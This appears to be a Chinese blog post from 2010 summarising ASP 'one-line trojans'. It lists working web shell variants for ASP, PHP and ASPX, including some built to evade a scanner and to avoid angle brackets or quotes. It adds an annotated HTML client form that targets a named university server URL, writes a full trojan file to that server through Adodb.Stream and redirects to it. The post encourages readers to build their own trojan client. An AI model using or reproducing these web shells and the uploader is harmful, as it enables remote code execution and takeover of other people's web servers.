asp一句话木马的总结分析

作者: 日期: 2010/12/04 发表评论 (0) 查看评论

首先看一下 那些事一句话木马

<%eval request(“MH”)%>

<%execute request(“MH”)%>

<%execute(request(“MH”))%>

<%If Request(“MH”)<>”” Then Execute(Request(“MH”))%>

<%if request (“MH”)<>””then session(“MH”)=request(“MH”):end if:if session(“MH”)<>”” then execute session(“MH”)%>

<SCRIPT language=VBScript runat=”server”>execute request(“MH”)</SCRIPT>

<%@ Page Language=”Jscript”%>

<%eval(Request.Item[“MH”],”unsafe”);%>

这些都是一句话的木马 其中<%eval request(“MH”)%> 是最简单的·但是有时候会有限制 所以才有了其他的代码

下面我们来分析一下原理是怎么回事的·:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了

***********************************************************

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp method=post>

//”action=”后面是需要修改的以asp命名的数据库的提交地址

<textarea name=value cols=120 rows=10 width=45>

//这里的value值根据服务端<%execute request(“value”)%>中value而设定

//可以自行修改成<%execute request(“p”)%>相应这里的value值也必须改为p

set lP=server.createObject(“Adodb.Stream”)//建立流对象,有了对象才可以使用它固有的属性和方法

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet=”gb2312″ //字体标准

lP.writetext request(“joeving”) //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath(“wei.asp”),2

//将木马内容以覆盖文件的方式写入wei.asp

//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp

//但和下面的response.redirect”wei.asp”中wei.asp的保持一致

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect “wei.asp” //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面

</textarea>

//这段程序的功能:利用插入到数据库文件的<%execute request(“value”)%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在 服务器上建立了个asp木马文件,这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>

//这段标签是你用来添加木马内容用的

<input type=submit value=提交>

</form>

//程序的主要框架是

<form>

<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

<textarea></textarea>//添加木马内容用的

</form>

其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵

再解释:

一句话木马就是在asp文件插入类似于这样的代码”<%execute request(“nneeenn”)%>”execute函数允许执行任意asp代码

在客户端写一个表单

<form action=”你挂马的页面” method=”post”>

<input type=”text” value=””><%–!此处的nneenn和<%execute request(“nneeenn”)%>中的nneeenn必须一致–%>

<input type=”submit” value=”发送”>

</form>

把上面的代码保存成mm.html

打开

在里面输入你要执行的asp代码

点击发送

这时 你写的asp 代码就在远程执行了

而那个asp代码可以是个小木马

———-更多一句话变种—————————————————

asp一句话
<%execute(request(“1″))%>

php一句话
<?php eval($_POST[1]);?>

aspx一句话
<script language=”C#” runat=”server”>
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(“add6bb58e139be10”);
</script>

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
ms.Language=”VBScript”
ms.AddObject “Response”, Response
ms.AddObject “request”, request
ms.ExecuteStatement(“ev”&”al(request(“”1″”))”)
%>

不用'<,>’的asp一句话
<script language=VBScript runat=server>execute request(“1”)</script>

不用双引号的一句话。
<%eval request(chr(35))%>

安全, ,
发表评论?

0 条评论。

发表评论